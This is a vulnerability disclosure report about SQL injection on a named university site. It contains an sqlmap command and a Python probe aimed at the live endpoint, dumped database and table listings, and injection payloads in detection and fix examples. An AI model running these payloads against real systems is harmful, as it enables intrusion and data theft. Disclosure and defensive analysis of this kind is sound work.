Vulnerability summary

Defect ID: wooyun-2015-0130978

Title: SQL injection on the main site of Jiangxi Radio and Television University (江西广播电视大学)

Vendor: Jiangxi Radio and Television University (江西广播电视大学)

Author: 冷白开。

Submitted: 2015-08-04 13:22

Fix deadline: 2015-08-09 13:24

Published: 2015-08-09 13:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed to a third-party partner organization (CCERT, the education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-08-04: details sent to the vendor, awaiting vendor handling
2015-08-09: vendor actively ignored the vulnerability, details disclosed to the public

Brief description:

SQL injection at Jiangxi Radio and Television University (江西广播电视大学)

Detailed description:

Injection command: sqlmap.py -u "http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx?TYPEID=" --dbs
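The sqlmap run above reports the injection but does not show what it relies on. The following is an added example, not code from the report, that confirms the TYPEID injection point by hand with the boolean-based differential check sqlmap itself uses: a payload that keeps the handler's query logically true should return the normal page, and one that makes it false should not. The URL and parameter are the ones named in the report; the payload pairs, the similarity threshold and the numeric-versus-quoted assumption about TYPEID are assumptions of this example.

```python
"""Manual boolean-based confirmation of the TYPEID injection point.

Added example; it is not part of the original report. The URL and parameter
are the ones named in the report; the payload pairs and the similarity
threshold are assumptions of this example.
"""
import urllib.parse
import urllib.request
from difflib import SequenceMatcher

BASE_URL = "http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx"
PARAM = "TYPEID"

# Each pair keeps the handler's query logically unchanged (left) and falsifies
# it (right). The first pair assumes TYPEID is used as a number, the second
# assumes it is embedded inside single quotes (the payload closes the string).
PAYLOAD_PAIRS = [
    ("1 AND 1=1", "1 AND 1=2"),
    ("1' AND '1'='1", "1' AND '1'='2"),
]


def similarity(a: str, b: str) -> float:
    """Similarity ratio of two response bodies in [0.0, 1.0]; 1.0 means identical."""
    return SequenceMatcher(None, a, b).ratio()


def looks_injectable(body_base: str, body_true: str, body_false: str,
                     threshold: float = 0.98) -> bool:
    """Boolean-based heuristic: the TRUE payload reproduces the baseline page
    (ratio >= threshold) while the FALSE payload changes it (ratio < threshold)."""
    return (similarity(body_base, body_true) >= threshold
            and similarity(body_base, body_false) < threshold)


def fetch(value: str, timeout: float = 10.0) -> str:
    """GET the endpoint with PARAM set to value and return the body as text."""
    url = BASE_URL + "?" + urllib.parse.urlencode({PARAM: value})
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe(threshold: float = 0.98) -> list:
    """Return the payload pairs for which the differential check fires."""
    base = fetch("1")
    # Calibration: two identical requests must themselves pass the threshold,
    # otherwise per-request dynamic content (timestamps, tokens) would produce
    # false positives and the comparison has to be tightened first.
    if similarity(base, fetch("1")) < threshold:
        raise RuntimeError("baseline response is not stable; strip dynamic content before comparing")
    hits = []
    for true_payload, false_payload in PAYLOAD_PAIRS:
        if looks_injectable(base, fetch(true_payload), fetch(false_payload), threshold):
            hits.append((true_payload, false_payload))
    return hits


if __name__ == "__main__":
    for pair in probe():
        print("boolean-based injection suspected; payload pair:", pair)
```

The calibration step matters more than the payloads: a page that embeds a timestamp or a per-request token never compares equal to itself, and without that check every FALSE payload would look like a confirmed injection.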

[Screenshot: S1.png]

Dumping some data at random for you to see

Database: jxdd
[52 tables]
+-----------------------+
| IS_Type |
| SYS_USERLOG |
| Sys_Log |
| TE_Activity |
| TE_Ads |
| TE_Contact |
| TE_DTJL |
| TE_DateDic |
| TE_Dept |
| TE_DeptNewsType |
| TE_LINK |
| TE_News |
| TE_Role |
| TE_RoleMenu |
| TE_RoleUser |
| TE_SalaryFL |
| TE_SalaryGT |
| TE_SalaryGZ |
| TE_SalaryJX |
| TE_SignUp |
| TE_SignUpTime |
| TE_SubsitePic |
| TE_TK |
| TE_TKLB |
| TE_User |
| TE_UserDeptNewsType |
| TE_VideoNews |
| View_Contact |
| View_DTJL |
| View_Dept |
| View_DeptNewsType |
| View_ISType |
| View_LINK |
| View_News |
| View_News_Pic |
| View_Role |
| View_RoleUser |
| View_SalaryFL |
| View_SalaryGT |
| View_SalaryGZ |
| View_SalaryJX |
| View_Sys_log |
| View_TE_Activity |
| View_TE_DateDic |
| View_TE_NewsAudit |
| View_TE_SignUp |
| View_TE_SubsitePic |
| View_TK |
| View_TKLB |
| View_User |
| View_UserDeptNewsType |
| View_VideoNews |
+-----------------------+
Database: jxdd1005
[28 tables]
+---------------------+
| D99_CMD |
| D99_Tmp |
| IS_Type |
| SYS_USERLOG |
| Sys_Log |
| TE_Activity |
| TE_Contact |
| TE_DTJL |
| TE_DateDic |
| TE_Dept |
| TE_DeptNewsType |
| TE_LINK |
| TE_News |
| TE_Role |
| TE_RoleMenu |
| TE_RoleUser |
| TE_SalaryFL |
| TE_SalaryGT |
| TE_SalaryGZ |
| TE_SalaryJX |
| TE_SignUp |
| TE_SignUpTime |
| TE_SubsitePic |
| TE_TK |
| TE_TKLB |
| TE_User |
| TE_UserDeptNewsType |
| TE_VideoNews |
+---------------------+
Database: jxddtest
[28 tables]
+---------------------+
| IS_Type |
| SYS_USERLOG |
| Sys_Log |
| TE_Activity |
| TE_Contact |
| TE_DTJL |
| TE_DateDic |
| TE_Dept |
| TE_DeptNewsType |
| TE_LINK |
| TE_News |
| TE_Role |
| TE_RoleMenu |
| TE_RoleUser |
| TE_SalaryFL |
| TE_SalaryGT |
| TE_SalaryGZ |
| TE_SalaryJX |
| TE_SignUp |
| TE_SignUpTime |
| TE_SubsitePic |
| TE_TK |
| TE_TKLB |
| TE_User |
| TE_UserDeptNewsType |
| TE_VideoNews |
| person_backup |
| test |
+---------------------+
Database: msdb
[141 tables]
+-----------------------------------------------------------+
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items_internal |
| syscollector_collection_sets_internal |
| syscollector_collector_types_internal |
| syscollector_config_store_internal |
| syscollector_execution_log_internal |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdac_history_internal |
| sysdac_instances_internal |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_log |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_server |
| sysmail_servertype |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| syspolicy_conditions_internal |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets_internal |
| syspolicy_policies_internal |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxysubsystem |
| sysschedules |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systaskids |
| sysutility_mi_configuration_internal |
| sysutility_mi_cpu_stage_internal |
| sysutility_mi_dac_execution_statistics_internal |
| sysutility_mi_session_statistics_internal |
| sysutility_mi_smo_objects_to_collect_internal |
| sysutility_mi_smo_properties_to_collect_internal |
| sysutility_mi_smo_stage_internal |
| sysutility_mi_volumes_stage_internal |
| sysutility_ucp_aggregated_dac_health_internal |
| sysutility_ucp_aggregated_mi_health_internal |
| sysutility_ucp_computer_cpu_health_internal |
| sysutility_ucp_computers_stub |
| sysutility_ucp_configuration_internal |
| sysutility_ucp_cpu_utilization_stub |
| sysutility_ucp_dac_file_space_health_internal |
| sysutility_ucp_dac_health_internal |
| sysutility_ucp_dacs_stub |
| sysutility_ucp_databases_stub |
| sysutility_ucp_datafiles_stub |
| sysutility_ucp_filegroups_stub |
| sysutility_ucp_filegroups_with_policy_violations_internal |
| sysutility_ucp_health_policies_internal |
| sysutility_ucp_logfiles_stub |
| sysutility_ucp_managed_instances_internal |
| sysutility_ucp_mi_database_health_internal |
| sysutility_ucp_mi_file_space_health_internal |
| sysutility_ucp_mi_health_internal |
| sysutility_ucp_mi_volume_space_health_internal |
| sysutility_ucp_policy_check_conditions_internal |
| sysutility_ucp_policy_target_conditions_internal |
| sysutility_ucp_policy_violations_internal |
| sysutility_ucp_processing_state_internal |
| sysutility_ucp_smo_servers_stub |
| sysutility_ucp_snapshot_partitions_internal |
| sysutility_ucp_space_utilization_stub |
| sysutility_ucp_supported_object_types_internal |
| sysutility_ucp_volumes_stub |
+-----------------------------------------------------------+
Database: master
[6 tables]
+-----------------------+
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
+-----------------------+
Database: ReportServer
[34 tables]
+---------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| Catalog |
| ChunkData |
| ChunkSegmentMapping |
| ConfigurationInfo |
| DBUpgradeHistory |
| DataSets |
| DataSource |
| Event |
| ExecutionLogStorage |
| History |
| Keys |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| Segment |
| SegmentedChunk |
| ServerParametersInstance |
| ServerUpgradeHistory |
| SnapshotData |
| Subscriptions |
| SubscriptionsBeingDeleted |
| UpgradeInfo |
| Users |
+---------------------------+
Table: SYS_USERLOG
[90 columns]
+---------------------------------+-------------+
| Column | Type |
+---------------------------------+-------------+
| adminname | non-numeric |
| allowviewlog | numeric |
| ana_codice | non-numeric |
| artikel_id | non-numeric |
| auth_id | non-numeric |
| beneficiarioid | non-numeric |
| bloc_row | non-numeric |
| blog_id | numeric |
| brend | non-numeric |
| cd | non-numeric |
| codigo | non-numeric |
| comment5 | non-numeric |
| comune | non-numeric |
| content_id | non-numeric |
| context | non-numeric |
| del_flg | non-numeric |
| distconnectorid | non-numeric |
| endstateid | non-numeric |
| freewaylogin | non-numeric |
| id_breve | non-numeric |
| id_servico | non-numeric |
| idcliente | numeric |
| iddiscipline | non-numeric |
| idevent | non-numeric |
| idoggetto | non-numeric |
| idprovenienza | non-numeric |
| idtipologiaservizio | non-numeric |
| itemno | non-numeric |
| jcode | non-numeric |
| jeda | non-numeric |
| jfcategories | non-numeric |
| job_s_date | non-numeric |
| l_col_list | numeric |
| layer | non-numeric |
| lbl_aom_unaccessible_shipmethod | non-numeric |
| level | non-numeric |
| mealid | non-numeric |
| meetingid | non-numeric |
| mod_freeway_products | non-numeric |
| modify_date | non-numeric |
| myname | non-numeric |
| mypassword | non-numeric |
| newnotices | non-numeric |
| orecchini | numeric |
| ostdate | non-numeric |
| parent_id | non-numeric |
| passe | non-numeric |
| permission | numeric |
| pfs_id | numeric |
| prc_sconto4 | non-numeric |
| prenom | numeric |
| price01 | non-numeric |
| progetto | non-numeric |
| provincial | non-numeric |
| schedaid | non-numeric |
| secid | non-numeric |
| serverid | non-numeric |
| sessionid | non-numeric |
| settingsid | non-numeric |
| sot_utente_e | non-numeric |
| st_id | non-numeric |
| statechangeid | non-numeric |
| store2 | non-numeric |
| store3 | non-numeric |
| student_number | non-numeric |
| sub_image1 | non-numeric |
| sub_large_image4 | non-numeric |
| temppass | non-numeric |
| ten | non-numeric |
| term_id | non-numeric |
| top | non-numeric |
| uname | non-numeric |
| uno | non-numeric |
| user_ip | non-numeric |
| user_level | non-numeric |
| user_nm | non-numeric |
| user_pwd | non-numeric |
| user_uname | non-numeric |
| user_usernm | non-numeric |
| user_usernun | non-numeric |
| usrn | non-numeric |
| usrpass | non-numeric |
| ustawienie | non-numeric |
| vm_manufacturer | non-numeric |
| vm_manufacturer_category | non-numeric |
| vot_proposta_e | non-numeric |
| weblinks | non-numeric |
| xadvogado | non-numeric |
| xmetodo_atualizacao | non-numeric |
| yonghu | non-numeric |
+---------------------------------+-------------+

Not going any further, it's too late; off to bed.
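The run above leaves a clear trail in the web server's own logs, which is what the vendor (or the CCERT responder) would have reviewed. The following is an added example, not part of the report, that flags the sqlmap run against GetSchoolOverview.ashx in IIS W3C logs using two independent signals: sqlmap's default User-Agent, and SQL syntax or non-numeric values in a parameter the application treats as an integer. The log lines are constructed for this example (IIS writes spaces inside a field as '+' and logs the query string percent-encoded as the client sent it); the field list, client addresses and the assumption that TYPEID is numeric are all assumptions of the example. Two table names in the jxdd1005 listing, D99_CMD and D99_Tmp, are commonly associated with older SQL Server injection tools that stage xp_cmdshell output in scratch tables, so a log review should reach back well before 2015-08-04 rather than stop at this one run.

```python
"""Detection of an sqlmap run against GetSchoolOverview.ashx in IIS W3C logs.

Added example, not from the report. SAMPLE_LOG is constructed; the field
list, client addresses and the numeric-parameter assumption for TYPEID are
assumptions of this example.
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-08-04 05:10:01 10.0.0.5 GET /Service/GetSchoolOverview.ashx TYPEID=1 80 - 203.0.113.7 Mozilla/5.0+(Windows+NT+6.1)+Firefox/39.0 200
2015-08-04 05:11:13 10.0.0.5 GET /Service/GetSchoolOverview.ashx TYPEID=%20AND%201%3D1 80 - 203.0.113.9 sqlmap/1.0-dev+(http://sqlmap.org) 200
2015-08-04 05:11:14 10.0.0.5 GET /Service/GetSchoolOverview.ashx TYPEID=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 80 - 203.0.113.9 sqlmap/1.0-dev+(http://sqlmap.org) 200
2015-08-04 05:11:15 10.0.0.5 GET /Service/GetSchoolOverview.ashx TYPEID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- 80 - 203.0.113.9 sqlmap/1.0-dev+(http://sqlmap.org) 500
2015-08-04 05:12:00 10.0.0.5 GET /index.aspx - 80 - 203.0.113.10 Mozilla/5.0+(Windows+NT+6.1)+Firefox/39.0 200
"""

# Parameters the application treats as integers (assumption for TYPEID).
NUMERIC_PARAMS = {"TYPEID"}

# SQL fragments that have no business inside a query-string value. Kept generic
# rather than sqlmap-specific, because the User-Agent is trivially changed.
SQL_PATTERN = re.compile(
    r"union\s+(all\s+)?select|waitfor\s+delay|\b(and|or)\s+\d+\s*=\s*\d+"
    r"|xp_cmdshell|@@version|sysdatabases|information_schema|--|/\*",
    re.IGNORECASE,
)


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            values = line.split()
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def classify(row):
    """Return the list of reasons a log row looks like an injection attempt."""
    reasons = []
    ua = row.get("cs(User-Agent)", "-").replace("+", " ")
    if ua.lower().startswith("sqlmap/"):
        reasons.append("sqlmap default User-Agent")
    query = row.get("cs-uri-query", "-")
    if query != "-":
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)
            if SQL_PATTERN.search(value):
                reasons.append(f"SQL syntax in parameter {name}")
            if name in NUMERIC_PARAMS and not value.strip().isdigit():
                reasons.append(f"non-numeric value for {name}: {value!r}")
    return reasons


def find_injection_attempts(text):
    """Rows with at least one reason, each annotated with its reasons."""
    hits = []
    for row in parse_w3c(text):
        reasons = classify(row)
        if reasons:
            hits.append({**row, "reasons": reasons})
    return hits


def attackers(text):
    """Distinct client addresses behind the flagged rows, for blocking or pivoting."""
    return sorted({h["c-ip"] for h in find_injection_attempts(text)})


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-uri-stem"], hit["reasons"])
    print("attacker addresses:", attackers(SAMPLE_LOG))
```

The numeric-parameter rule is the one worth keeping after the incident: it needs no signature, and a value for TYPEID that is not an integer is wrong whoever sends it.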

Proof of vulnerability:

As above.

Fix recommendation:

You know.

Copyright notice: when reposting, please credit the source: 冷白开。@乌云
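The report leaves the fix unstated. The following is an added example, not the site's code, showing the query pattern this class of bug almost always comes from beside its repair: the query-string value is first concatenated into the SQL text, then validated as an integer and bound as a parameter. The report does not show the handler's source, so the vulnerable query is an assumption; the table and column names (TE_Dept, TE_User, uname, user_pwd) are taken from the report's listing, the rows are constructed, and SQLite stands in for the SQL Server behind the site so the example runs offline (string concatenation is || here and + on SQL Server, the only dialect difference the payload touches).

```python
"""The query pattern behind the report's injection, beside its fix.

Added example, not the site's code. The concatenated query is an assumed
pattern; table and column names come from the report's listing; the rows
are constructed; SQLite stands in for SQL Server.
"""
import sqlite3


def make_db():
    """In-memory stand-in for the jxdd database with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE TE_Dept (id INTEGER PRIMARY KEY, name TEXT, typeid INTEGER);
        CREATE TABLE TE_User (id INTEGER PRIMARY KEY, uname TEXT, user_pwd TEXT);
        INSERT INTO TE_Dept VALUES (1, 'Overview', 1), (2, 'History', 2);
        INSERT INTO TE_User VALUES (1, 'admin', 'constructed-hash');
    """)
    return conn


def overview_vulnerable(conn, typeid):
    """Query-string value concatenated into the SQL text: the caller controls the statement."""
    sql = "SELECT name FROM TE_Dept WHERE typeid = " + typeid
    return [row[0] for row in conn.execute(sql)]


def overview_fixed(conn, typeid):
    """Validate the type, then bind. The value can never alter the statement's structure."""
    try:
        typeid_int = int(typeid)
    except (TypeError, ValueError):
        raise ValueError("TYPEID must be an integer")
    sql = "SELECT name FROM TE_Dept WHERE typeid = ?"
    return [row[0] for row in conn.execute(sql, (typeid_int,))]


# Constructed payload in the shape a UNION-based dump takes: it appends the
# user table to the department lookup.
INJECTED_TYPEID = "1 UNION ALL SELECT uname || ':' || user_pwd FROM TE_User"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:", overview_vulnerable(db, "1"))
    print("vulnerable, injected    :", overview_vulnerable(db, INJECTED_TYPEID))
    print("fixed, normal input     :", overview_fixed(db, "1"))
    try:
        overview_fixed(db, INJECTED_TYPEID)
    except ValueError as exc:
        print("fixed, injected         : rejected,", exc)
```

In the .ashx handler the same fix is a SqlCommand whose text contains @TYPEID and a typed parameter added with cmd.Parameters.Add("@TYPEID", SqlDbType.Int); the integer parse is what rejects the payload, the binding is what keeps the statement fixed even when a parameter is a string. Beyond the query, the database login used by the site should have rights only on the application database, so that a future injection cannot reach the other databases listed above.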


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2015-08-09 13:24

Vendor reply:

Latest status:

None yet

